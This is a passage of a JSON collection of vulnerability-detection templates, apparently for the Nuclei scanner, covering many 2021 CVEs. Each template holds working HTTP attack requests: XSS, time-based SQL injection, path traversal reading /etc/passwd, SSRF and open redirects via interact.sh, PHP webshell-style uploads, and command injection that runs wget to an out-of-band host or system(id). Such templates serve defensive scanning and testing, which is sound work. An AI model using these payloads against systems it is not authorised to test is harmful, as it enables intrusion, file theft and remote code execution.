application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"regex","negative":true,"part":"body","regex":["^BPS\\sDB\\sBACKUP\\sLOG\\r\\n==================\\r\\n==================\\r\\n\\r\\n$"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40272","info":{"name":"IRTS OP5 Monitor - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"help\\'onmouseover=alert(document.domain)/\\'/;/beta/license?format=json\\'>JSON\")","contains_any(tolower(body), \"op5 monitor\", \"itrs\")","contains(content_type, \"text/html\")","status_code == 401"],"condition":"and"}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-46418","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Creation","severity":"high"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{randstr}}\n","GET /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201","contains(server_1, \"lighttpd\") && contains(content_type_2, \"text/plain\")","contains(body_2, \"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24442","info":{"name":"Wordpress Polls Widget < 1.5.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Forwarded-For: {{randstr}}\n\nquestion_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains_all(body, \"{\\\"answer_name\", \"vote\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEB-INF/web.xml"],"matchers":[{"type":"dsl","internal":true,"dsl":["!contains_all(body, '</web-app>', 'java.sun.com')","!contains_all(header, 'application/xml')","status_code != 200","status_code != 404"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, '</web-app>', 'java.sun.com')","contains_all(header, 'application/xml')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey <1.5.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd","{{BaseURL}}/api/geojson?url=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a 